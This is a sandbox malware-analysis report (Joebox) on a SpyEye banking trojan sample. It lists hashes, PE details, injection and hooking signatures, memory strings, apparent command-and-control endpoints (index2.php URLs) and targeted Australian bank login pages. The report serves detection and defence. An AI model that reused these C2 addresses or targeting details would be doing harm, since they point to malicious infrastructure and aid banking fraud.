ANALYSIS OVERVIEWNETWORK DATAHOOKSCOLLAPSE ALL

Joebox - Abstract Analysis File 10058
+ General information
Joebox version: 4.5.0
Start time: 14:55:35
Start date: 01/12/2011
Overall analysis duration: 0h 6m 15s
Target binary file name: SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Target script file name: default.jbs
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 20
Errors:
  • Too many NtReadFile calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
+ Classification / Thread Score
Persistence, Installation Boot Survival:
Hidding, Stealthness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Executable is probably coded in java
  • Printf formatting strings found in memory and binary data
  • Queries a list of all open handles
  • Queries a list of all running processes
  • Spawns processes
  • Urls found in memory or binary data
  • Binary may include packed or crypted data
  • Contains long sleeps (> 4min)
  • Creates a mutex to recognise infected hosts
  • Entrypoint lies outside standard sections
  • PE file contains sections with non-standard names
  • Posts data to webserver
  • Relocates Windows system DLLs to bypass security applications
  • Allocates memory in foreign processes
  • Changes memory attributes in foreign processes to executable or writable
  • Found strings which match to known bank urls
  • Hijackes the control flow in another process
  • Hooks files or directories query functions (used to hide files and directories)
  • Hooks registry keys query functions (used to hide registry keys)
  • Hooks winsocket function (used for sniffing or altering network traffic)
  • Injects a PE file into a foreign processes
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • Writes to foreign memory regions
Static File Information
+ General Information
File name: SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
File size: 254976
MD5: 62d0915f2d31d0a060671d31419a0b80
SHA1: ee79f200b0b1e95b9822c60dd97ed53392d4a27c
SHA256: 68a7b5dd60d9b66f6d895aab540cf295d5d74273baa04224eafff686a189b064
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+ PE Information
+ General
Entrypoint: 0x461080L UPX1
Imagebase: 0x400000L
Time stamp: 0x4DA695A3 [Thu Apr 14 06:35:15 2011 UTC]
Subsystem: windows gui
TLS callbacks:
+ Resources
Name RVA address Size Type
English 0x5d388L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d390L 0x5L data
English 0x5d398L 0x5L ISO-8859 text, with no line terminators
English 0x5d3a0L 0x5L ISO-8859 text, with no line terminators
English 0x5d3a8L 0x5L data
English 0x5d3b0L 0x5L ISO-8859 text, with no line terminators
English 0x5d3b8L 0x5L data
English 0x5d3c0L 0x5L data
English 0x5d3c8L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x6238cL 0x300L data
English 0x5d6d0L 0x5L data
English 0x5d6d8L 0x5L ISO-8859 text, with no line terminators
English 0x5d6e0L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d6e8L 0x5L Non-ISO extended-ASCII text, with no line terminators
English 0x5d6f0L 0x5L ISO-8859 text, with no line terminators
English 0x5d6f8L 0x5L ISO-8859 text
English 0x5d700L 0x5L Non-ISO extended-ASCII text, with no line terminators
+ Imports
DLL Import
KERNEL32.DLL LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
advapi32.dll RegEnumKeyW
comctl32.dll ImageList_Add
comdlg32.dll ChooseColorW
crypt32.dll CryptProtectData
gdi32.dll DPtoLP
msimg32.dll AlphaBlend
msvcrt.dll ceil
ole32.dll DoDragDrop
rpcrt4.dll UuidEqual
secur32.dll GetUserNameExW
shell32.dll ShellAboutW
shlwapi.dll UrlIsW
urlmon.dll CreateAsyncBindCtx
user32.dll GetDC
version.dll VerQueryValueW
wininet.dll InternetOpenW
winmm.dll mixerOpen
+ Exports
+ Sections
Name Virtual address Virtual size Raw size entropy
UPX0 0x1000L 0x23000L 0x0L 0.0
UPX1 0x24000L 0x3e000L 0x3d400L 7.95836194309
.rsrc 0x62000L 0x1000L 0xc00L 3.33408150372
+ Version Infos
Description Data
FileVersion 9.10
InternalName Ire Enigma Chimp
ProductVersion 9.10
LegalCopyright Dike \xa9 Cain Plate 1996-2007
FileDescription Bowie Mauls Pad Alike Hefty
CompanyName Foundstone Inc.
ProductName Kiwi Arose Odd Hold Bit
OriginalFilename Pro.exe
Translation 0x0409 0x04b0
+ Possible Origin
Language of compilation system Country where language is spoken Map
English United States
String Analysis
+ Formattings for printf style functions
String value Source
[ERROR] : dwErr == %u ( Could be invalid encryption key ) B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
! R]\%C B6232F3AC2C.exe.dr
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
r = %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
threadmetadata!nfo%d SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
[ERROR] : dwErr == %u B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
[ERROR] : dwErr == %u ( Config is damaged ) B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%s\Content.IE5\%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
X%O}9} B6232F3AC2C.exe.dr
L,`%i=q B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe, 07A49F015E0D693.dr
%s%s%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%UweeF B6232F3AC2C.exe.dr
[ERROR] : Cannot dump file (%u bytes) { %s } B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Content-Length: %u B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
Global\%s SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
1+'``Q%E B6232F3AC2C.exe.dr
j}%p#j B6232F3AC2C.exe.dr
^S%e}n B6232F3AC2C.exe.dr
tid=%u&stat= B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%d-%d-%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
(GMT %s%02u:%02u) %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
%d.%d.%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
fx4s%x B6232F3AC2C.exe.dr
Host: %s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
"3Y!%p B6232F3AC2C.exe.dr
%s\Content.IE5\0 B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
!'cGR~U%Spg SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
}V(R%X B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe, 07A49F015E0D693.dr
%s%s&rep=%s B6232F3AC2C.exe, SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe
+ URLs
String value Source
http://ads1.msn.com/library/dap.js explorer.exe
http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.5.1.min.js explorer.exe
http://answers.microsoft.com/en-us explorer.exe
http://c.microsoft.com/trans_pixel.aspx explorer.exe
http://clk.atdmt.com/mrt/go/352379681/direct/01/ explorer.exe
http://clk.atdmt.com/mrt/go/352436867/direct/01/ explorer.exe
http://clk.atdmt.com/mrt/go/356376217/direct/01/ explorer.exe
http://crm.dynamics.com/en-us/ explorer.exe
http://explore.live.com/windows-live-essentials explorer.exe
http://go.microsoft.com/?linkid=2028325 explorer.exe
http://go.microsoft.com/?linkid=4412892 explorer.exe
http://go.microsoft.com/?linkid=9635967 explorer.exe
http://go.microsoft.com/fwlink/?linkid=194811 explorer.exe
http://go.microsoft.com/fwlink/?linkid=81184 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139750 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139753 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139754 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139755 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139756 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=139757 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=194812 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=194814 explorer.exe
http://go.microsoft.com/fwlink/p/?linkid=205329 explorer.exe
http://i.microsoft.com/en-us/homepage/bimapping.js?gv=bimapping&k=/en-us/homepage/components/bimapping.xml&v=-257223966 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataretrievers.attr.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataretrievers.structure.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.queue.js;~/shared/templates/components/mscomviews/controls/scripts/wedcs.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataconsumers.wedcs.js;~/shared/templates/components/mscomviews/controls/scripts/webtrends_16.js;~/shared/templates/components/mscomviews/controls/scripts/jquery.bi.dataconsumers.webtrends.js&v=-1065951950 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/controls/scripts/mscomhelper.js;~/shared/templates/components/mscomviews/blade/blade.js;~/shared/templates/components/mscomviews/search/search.js;~/shared/templates/components/mscomviews/localepicker/localepicker.js&v=-282235141 explorer.exe
http://i.microsoft.com/en-us/homepage/script.jsx?k=~/shared/templates/components/mscomviews/vpivot/vpivot.js;~/shared/templates/components/mscomviews/grid/grid.js;~/shared/templates/components/mscomviews/hero/hero.js;~/shared/templates/components/mscomviews/accordion/accordion.js;~/shared/templates/components/mscomviews/carousel/carousel.js&v=1793508902 explorer.exe
http://i.microsoft.com/en-us/homepage/shared/templates/components/hpsearch/images/searchsprite.ltr.gif explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/components/mscomviews/vpivot/vpivot-css.aspx;~/shared/templates/components/mscomviews/grid/grid-css.aspx;~/shared/templates/components/mscomviews/hero/hero-css.aspx;~/shared/templates/components/mscomviews/accordion/accordion-css.aspx;~/shared/templates/components/mscomviews/controls/featureitem/featureitem-css.aspx;~/shared/templates/components/mscomviews/carousel/carousel-css.aspx;~/shared/templates/components/mscomviews/list/list-css.aspx&sc=/en-us/homepage/site.config&pc=&v=-23108820 explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/master/hpmaster/master-css.aspx;~/shared/templates/components/mscomviews/blade/blade-css.aspx;~/shared/templates/components/mscomviews/header/he explorer.exe
http://i.microsoft.com/en-us/homepage/style.cssx?k=~/shared/templates/master/hpmaster/master-css.aspx;~/shared/templates/components/mscomviews/blade/blade-css.aspx;~/shared/templates/components/mscomviews/header/header-css.aspx;~/shared/templates explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/ielogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/officelogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/phonelogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/windowslogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/header/xboxlogo.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/hero/multi_appearance_v1_530x320_lt.jpg explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprite.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/16/bg_fade.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/16/bg_skirtsolid.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/microsoft.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/microsoft_gray.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/white-carousel.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/sprites/white_vpivot.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/answers_sm.jpg explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/office2010hs_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/officelogo_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/safetyscanner_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/winupdate_sm.png explorer.exe
http://i.microsoft.com/global/en-us/homepage/publishingimages/thumbnails/wp_red_sm.png explorer.exe
http://i3.microsoft.com/library/svy/broker.js explorer.exe
http://msdn.microsoft.com/en explorer.exe
http://msdn.microsoft.com/en-us/default.aspx explorer.exe
http://msdn.microsoft.com/en-us/evalcenter/default explorer.exe
http://msdn.microsoft.com/en-us/evalcenter/default.aspx explorer.exe
http://office.microsoft.com/ explorer.exe
http://office.microsoft.com/en-us/ explorer.exe
http://office.microsoft.com/en-us/clipart/default.aspx explorer.exe
http://office.microsoft.com/en-us/downloads explorer.exe
http://office.microsoft.com/en-us/downloads/downloads-marketplace-categories-fx102300516.aspx?category=cl102475746#last=;index=0 explorer.exe
http://office.microsoft.com/en-us/excel/ explorer.exe
http://office.microsoft.com/en-us/home-and-student/office-home-and-student-fx101845698.aspx explorer.exe
http://office.microsoft.com/en-us/images/default.aspx explorer.exe
http://office.microsoft.com/en-us/support explorer.exe
http://office.microsoft.com/en-us/support/ explorer.exe
http://office.microsoft.com/en-us/templates/ explorer.exe
http://office.microsoft.com/en-us/templates/default.aspx explorer.exe
http://office.microsoft.com/en-us/try explorer.exe
http://office.microsoft.com/en-us/web-apps/ explorer.exe
http://pinpoint.microsoft.com/?wt.mc_id=mscom_hp_us_nav_pc_solutions explorer.exe
http://pinpoint.microsoft.com/en-us/default.aspx?wt.mc_id=mscom_hp_us_bl_pinpoint explorer.exe
http://search.microsoft.com/results.aspx?form=mshome&mkt= explorer.exe
http://search.microsoft.com/shared/templates/master/smcpage/autosuggesthandler.ashx?q= explorer.exe
http://shop.solution-networks.de/index2.php explorer.exe
http://shop.solution-networks.de/index2.php;80 explorer.exe
http://store.microsoft.com/microsoft/computers/category/410 explorer.exe
http://support.microsoft.com/ explorer.exe
http://support.microsoft.com/?ln=en-us&x=16&y=12 explorer.exe
http://support.microsoft.com/fixit explorer.exe
http://support.microsoft.com/gp/windows_mobile_master#tab0 explorer.exe
http://support.microsoft.com/search explorer.exe
http://technet.microsoft.com/en-us/bb736012.aspx explorer.exe
http://technet.microsoft.com/en-us/default.aspx explorer.exe
http://technet.microsoft.com/en-us/network/bb530679 explorer.exe
http://technet.microsoft.com/en-us/wsus/default.aspx explorer.exe
http://update.microsoft.com/microsoftupdate explorer.exe
http://windows.microsoft.com/ explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/downloads/ie explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/help explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/products/ie-9/features/download-manager explorer.exe
http://windows.microsoft.com/en-us/internet-explorer/products/ie/home explorer.exe
http://windows.microsoft.com/en-us/windows/downloads explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/personalize/themes explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/personalize/wallpaper-desktop-background explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/service-packs explorer.exe
http://windows.microsoft.com/en-us/windows/downloads/windows-media-player explorer.exe
http://windows.microsoft.com/en-us/windows/help explorer.exe
http://windows.microsoft.com/en-us/windows/help/learn-how-to-install-windows-xp-service-pack-3-sp3 explorer.exe
http://windows.microsoft.com/en-us/windows/home explorer.exe
http://windows.microsoft.com/en-us/windows/products explorer.exe
http://windows.microsoft.com/en-us/windows/products/security-essentials explorer.exe
http://windows.microsoft.com/en-us/windows7/looking-for-windows-messenger explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/internet-tv explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/movie-maker explorer.exe
http://windows.microsoft.com/en-us/windows7/products/features/photo-gallery explorer.exe
http://windows.microsoft.com/en-us/windows7/seeing-is-believing-use-a-webcam-to-bring-your-instant-messaging-to-life explorer.exe
http://windows.microsoft.com/en-us/windows7/understanding-security-and-safer-computing explorer.exe
http://www.bing.com/ explorer.exe
http://www.bing.com/finance/ explorer.exe
http://www.bing.com/images/ explorer.exe
http://www.bing.com/maps/ explorer.exe
http://www.bing.com/music explorer.exe
http://www.bing.com/music/lyrics explorer.exe
http://www.bing.com/news explorer.exe
http://www.bing.com/search?form=mshpls&q= explorer.exe
http://www.bing.com/shopping explorer.exe
http://www.bing.com/travel/ explorer.exe
http://www.bing.com/videos explorer.exe
http://www.bing.com/weather/search?q=weather explorer.exe
http://www.drankenservicestein.nl/index2.php explorer.exe
http://www.drankenservicestein.nl/index2.php;800 explorer.exe
http://www.gamesforwindows.com/en-us explorer.exe
http://www.gamesforwindows.com/en-us/ explorer.exe
http://www.gooeylouiecake.com/test/index2.php explorer.exe
http://www.gooeylouiecake.com/test/index2.php;80 explorer.exe
http://www.ieaddons.com/ explorer.exe
http://www.microsoft.co explorer.exe
http://www.microsoft.com explorer.exe
http://www.microsoft.com/ explorer.exe
http://www.microsoft.com/about/default.mspx explorer.exe
http://www.microsoft.com/ar/eg/ explorer.exe
http://www.microsoft.com/ar/gulf/ explorer.exe
http://www.microsoft.com/ar/iq/ explorer.exe
http://www.microsoft.com/ar/ly/ explorer.exe
http://www.microsoft.com/ar/sa/ explorer.exe
http://www.microsoft.com/ar/xm/ explorer.exe
http://www.microsoft.com/athome/organization/twomonitors.aspx explorer.exe
http://www.microsoft.com/athome/organization/wirelesssetup.aspx explorer.exe
http://www.microsoft.com/athome/setup/maintenance.aspx explorer.exe
http://www.microsoft.com/athome/setup/wirelesstips.aspx explorer.exe
http://www.microsoft.com/athome/students/timewastergames.aspx explorer.exe
http://www.microsoft.com/az-latn/az/ explorer.exe
http://www.microsoft.com/be/by/ explorer.exe
http://www.microsoft.com/bg/bg/ explorer.exe
http://www.microsoft.com/bi explorer.exe
http://www.microsoft.com/bs/ba/ explorer.exe
http://www.microsoft.com/business explorer.exe
http://www.microsoft.com/business/en-us/?fbid=la48qib2qmo explorer.exe
http://www.microsoft.com/business/en-us/default.aspx explorer.exe
http://www.microsoft.com/business/en-us/resources/startups/business-plans-entities/how-to-write-a-business-plan.aspx explorer.exe
http://www.microsoft.com/careers explorer.exe
http://www.microsoft.com/careers/ explorer.exe
http://www.microsoft.com/cloud/ explorer.exe
http://www.microsoft.com/communities/forums/default.mspx explorer.exe
http://www.microsoft.com/cs/cz/ explorer.exe
http://www.microsoft.com/da/dk/ explorer.exe
http://www.microsoft.com/de/at/ explorer.exe
http://www.microsoft.com/de/ch/ explorer.exe
http://www.microsoft.com/de/de/ explorer.exe
http://www.microsoft.com/download/en/?wt.mc_id=mscom_en_us_hp_module_12 explorer.exe
http://www.microsoft.com/download/en/?wt.mc_id=mscom_en_us_hp_module_121lsus008226 explorer.exe
http://www.microsoft.com/download/en/default.aspx explorer.exe
http://www.microsoft.com/download/en/default.aspx?wt.mc_id=mscom_hp_us_nav_downloads explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=16&wt.mc_id=mscom_en_us_hp_module_121lsus008548 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=17851&wt.mc_id=mscom_en_us_hp_module_121lsus007996 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=3&wt.mc_id=mscom_en_us_hp_module_121lsus007870 explorer.exe
http://www.microsoft.com/download/en/details.aspx?id=35&wt.mc_id=mscom_en_us_hp_module_121lsus007776 explorer.exe
http://www.microsoft.com/downloads/en/default.aspx explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=2da43d38-db71-4c1b-bc6a-9b6652cd92a3 explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=3c4a9767-6f29-4cd1-93e7-0a738d2d4fc9 explorer.exe
http://www.microsoft.com/downloads/en/details.aspx?familyid=9cfb2d51-5ff4-4491-b0e5-b386f32c0992 explorer.exe
http://www.microsoft.com/dynamics explorer.exe
http://www.microsoft.com/el/gr/ explorer.exe
http://www.microsoft.com/en-us/ explorer.exe
http://www.microsoft.com/en-us/cloud/default.aspx explorer.exe
http://www.microsoft.com/en-us/default.aspx explorer.exe
http://www.microsoft.com/en-us/dynamics/default.aspx explorer.exe
http://www.microsoft.com/en-us/showcase/default.aspx explorer.exe
http://www.microsoft.com/en-us/skype/ explorer.exe
http://www.microsoft.com/en/au/ explorer.exe
http://www.microsoft.com/en/bd/ explorer.exe
http://www.microsoft.com/en/bn/ explorer.exe
http://www.microsoft.com/en/ca/ explorer.exe
http://www.microsoft.com/en/cy/ explorer.exe
http://www.microsoft.com/en/eg/ explorer.exe
http://www.microsoft.com/en/esa/ explorer.exe
http://www.microsoft.com/en/gb/ explorer.exe
http://www.microsoft.com/en/gulf/ explorer.exe
http://www.microsoft.com/en/hk/ explorer.exe
http://www.microsoft.com/en/id/ explorer.exe
http://www.microsoft.com/en/ie/ explorer.exe
http://www.microsoft.com/en/in/ explorer.exe
http://www.microsoft.com/en/jo/ explorer.exe
http://www.microsoft.com/en/lb/ explorer.exe
http://www.microsoft.com/en/lk/ explorer.exe
http://www.microsoft.com/en/mt/ explorer.exe
http://www.microsoft.com/en/my/ explorer.exe
http://www.microsoft.com/en/ng/ explorer.exe
http://www.microsoft.com/en/nz/ explorer.exe
http://www.microsoft.com/en/ph/ explorer.exe
http://www.microsoft.com/en/pk/ explorer.exe
http://www.microsoft.com/en/sa/ explorer.exe
http://www.microsoft.com/en/sg/ explorer.exe
http://www.microsoft.com/en/us/sitemap.aspx explorer.exe
http://www.microsoft.com/en/westindies/default.aspx explorer.exe
http://www.microsoft.com/en/xf/ explorer.exe
http://www.microsoft.com/en/xm/ explorer.exe
http://www.microsoft.com/en/za/ explorer.exe
http://www.microsoft.com/enterprise/ explorer.exe
http://www.microsoft.com/enterprise/default.aspx explorer.exe
http://www.microsoft.com/es/ar/ explorer.exe
http://www.microsoft.com/es/bo/ explorer.exe
http://www.microsoft.com/es/cl/ explorer.exe
http://www.microsoft.com/es/co/ explorer.exe
http://www.microsoft.com/es/cr/ explorer.exe
http://www.microsoft.com/es/do/ explorer.exe
http://www.microsoft.com/es/ec/ explorer.exe
http://www.microsoft.com/es/es/ explorer.exe
http://www.microsoft.com/es/gt/ explorer.exe
http://www.microsoft.com/es/hn/ explorer.exe
http://www.microsoft.com/es/mx/ explorer.exe
http://www.microsoft.com/es/ni/ explorer.exe
http://www.microsoft.com/es/pa/ explorer.exe
http://www.microsoft.com/es/pe/ explorer.exe
http://www.microsoft.com/es/pr/ explorer.exe
http://www.microsoft.com/es/py/ explorer.exe
http://www.microsoft.com/es/sv/ explorer.exe
http://www.microsoft.com/es/uy/ explorer.exe
http://www.microsoft.com/es/ve/ explorer.exe
http://www.microsoft.com/es/xl/ explorer.exe
http://www.microsoft.com/et/ee/ explorer.exe
http://www.microsoft.com/expression/default.aspx explorer.exe
http://www.microsoft.com/fi/fi/ explorer.exe
http://www.microsoft.com/fr/be/ explorer.exe
http://www.microsoft.com/fr/ca/ explorer.exe
http://www.microsoft.com/fr/ch/ explorer.exe
http://www.microsoft.com/fr/dz/ explorer.exe
http://www.microsoft.com/fr/fr/ explorer.exe
http://www.microsoft.com/fr/ioi/ explorer.exe
http://www.microsoft.com/fr/ma/ explorer.exe
http://www.microsoft.com/fr/tn/ explorer.exe
http://www.microsoft.com/fr/wca/ explorer.exe
http://www.microsoft.com/fr/xf/ explorer.exe
http://www.microsoft.com/games/ explorer.exe
http://www.microsoft.com/getsilverlight/get-started/install/default.aspx explorer.exe
http://www.microsoft.com/hardware/default.aspx explorer.exe
http://www.microsoft.com/hardware/downloads/default.mspx explorer.exe
http://www.microsoft.com/hardware/en-us explorer.exe
http://www.microsoft.com/hardware/en-us/support explorer.exe
http://www.microsoft.com/hardware/mouseandkeyboard/default.mspx explorer.exe
http://www.microsoft.com/he/il/ explorer.exe
http://www.microsoft.com/hr/hr/ explorer.exe
http://www.microsoft.com/hu/hu/ explorer.exe
http://www.microsoft.com/hy/am/ explorer.exe
http://www.microsoft.com/industry/government/solutions/usgcb/default.aspx explorer.exe
http://www.microsoft.com/investor explorer.exe
http://www.microsoft.com/is/is/ explorer.exe
http://www.microsoft.com/it/it/ explorer.exe
http://www.microsoft.com/ja/jp/ explorer.exe
http://www.microsoft.com/ka/ge/ explorer.exe
http://www.microsoft.com/ko/kr/ explorer.exe
http://www.microsoft.com/learning/en/us/default.aspx explorer.exe
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx explorer.exe
http://www.microsoft.com/licensing/default.mspx explorer.exe
http://www.microsoft.com/lt/lt/ explorer.exe
http://www.microsoft.com/lv/lv/ explorer.exe
http://www.microsoft.com/mk/mk/ explorer.exe
http://www.microsoft.com/nb/no/ explorer.exe
http://www.microsoft.com/news explorer.exe
http://www.microsoft.com/nl/be/ explorer.exe
http://www.microsoft.com/nl/nl/ explorer.exe
http://www.microsoft.com/office explorer.exe
http://www.microsoft.com/pl/pl/ explorer.exe
http://www.microsoft.com/presspass/default.mspx explorer.exe
http://www.microsoft.com/presspass/features/2011/nov11/11-28bingtopterms.mspx explorer.exe
http://www.microsoft.com/presspass/press/2011/nov11/11-29safetykleenpr.mspx explorer.exe
http://www.microsoft.com/presspass/presskits/office/online explorer.exe
http://www.microsoft.com/pt/br/ explorer.exe
http://www.microsoft.com/pt/pt/ explorer.exe
http://www.microsoft.com/ro/md/ explorer.exe
http://www.microsoft.com/ro/ro/ explorer.exe
http://www.microsoft.com/ru/kz/ explorer.exe
http://www.microsoft.com/ru/ru/ explorer.exe
http://www.microsoft.com/security/default.aspx explorer.exe
http://www.microsoft.com/security/pc-security/conficker.aspx explorer.exe
http://www.microsoft.com/security/pc-security/default.aspx explorer.exe
http://www.microsoft.com/security/pc-security/firewalls-whatis.aspx explorer.exe
http://www.microsoft.com/security/pc-security/malware-removal.aspx explorer.exe
http://www.microsoft.com/security/r explorer.exe
http://www.microsoft.com/security/resources/antivirus-whatis.aspx explorer.exe
http://www.microsoft.com/security/scanner/en-us/default.aspx explorer.exe
http://www.microsoft.com/servers/home.mspx explorer.exe
http://www.microsoft.com/serviceproviders/saas/default.mspx explorer.exe
http://www.microsoft.com/sk/ explorer.exe
http://www.microsoft.com/sk/sk/ explorer.exe
http://www.microsoft.com/sl/si/ explorer.exe
http://www.microsoft.com/sq/al/ explorer.exe
http://www.microsoft.com/sqlserver/en/us/default.aspx explorer.exe
http://www.microsoft.com/sr/latn-me/ explorer.exe
http://www.microsoft.com/sr/latn-rs/ explorer.exe
http://www.microsoft.com/sv/se/ explorer.exe
http://www.microsoft.com/th/th/ explorer.exe
http://www.microsoft.com/tr/tr/ explorer.exe
http://www.microsoft.com/ukr/ua/ explorer.exe
http://www.microsoft.com/vi/vn/ explorer.exe
http://www.microsoft.com/win explorer.exe
http://www.microsoft.com/windowsphone/en-us/apps/default.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/buy/7/default.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/buy/7/phones.aspx explorer.exe
http://www.microsoft.com/windowsphone/en-us/default.aspx explorer.exe
http://www.microsoft.com/zh/cn/ explorer.exe
http://www.microsoft.com/zh/hk/ explorer.exe
http://www.microsoft.com/zh/tw/ explorer.exe
http://www.microsoftstore.com/ explorer.exe
http://www.microsoftstore.com/store/msstore/cat/categoryid.50606600 explorer.exe
http://www.microsoftstore.com/store/msstore/cat/parentcategoryid.44067000/categoryid.50791300 explorer.exe
http://www.microsoftstore.com/store/msstore/en_us/cat/parentcategoryid.37946100/categoryid.50799400?wt.mc_id=mscom_hp_us_bl_buybizsoftware explorer.exe
http://www.microsoftstore.com/store/msstore/list/parentcategoryid.44066900/categoryid.50787200 explorer.exe
http://www.microsoftstore.com/store/msstore/list/parentcategoryid.50606600/categoryid.50789900 explorer.exe
http://www.update.microsoft.com/microsoftupdate/v6/vistadefault.aspx?ln=en-us explorer.exe
http://www.w3.org/1999/xhtml explorer.exe
http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd explorer.exe
http://www.xbox.com/ explorer.exe
http://www.xbox.com/en-us/ explorer.exe
http://www.zune.com/ explorer.exe
https://ibank.b-e.com.au/ibank/ svchost.exe
https://ibank.b-e.com.au/ibank/login.asp MDM.EXE, svchost.exe
https://ibank.melbcdf.com.au/brisbanemyviewpoint/login.asp svchost.exe
https://internetbanking.firstoptioncu.com.au/mvptab/login.asp svchost.exe
https://mvp.novacu.com.au/mvpnova/login.asp svchost.exe
https://mvp.sccu.com.au/mvpsccu/login.asp svchost.exe
https://netteller.sydneycu.com.au/802084v45/ntv45.asp?wci=entry svchost.exe
https://netteller2.victeach.com.au/704191v47/ntv47.asp?wci=entry svchost.exe
https://online.westpac.com.au/esis/login/srvpage svchost.exe
https://partner.microsoft.com/us/30000104 explorer.exe
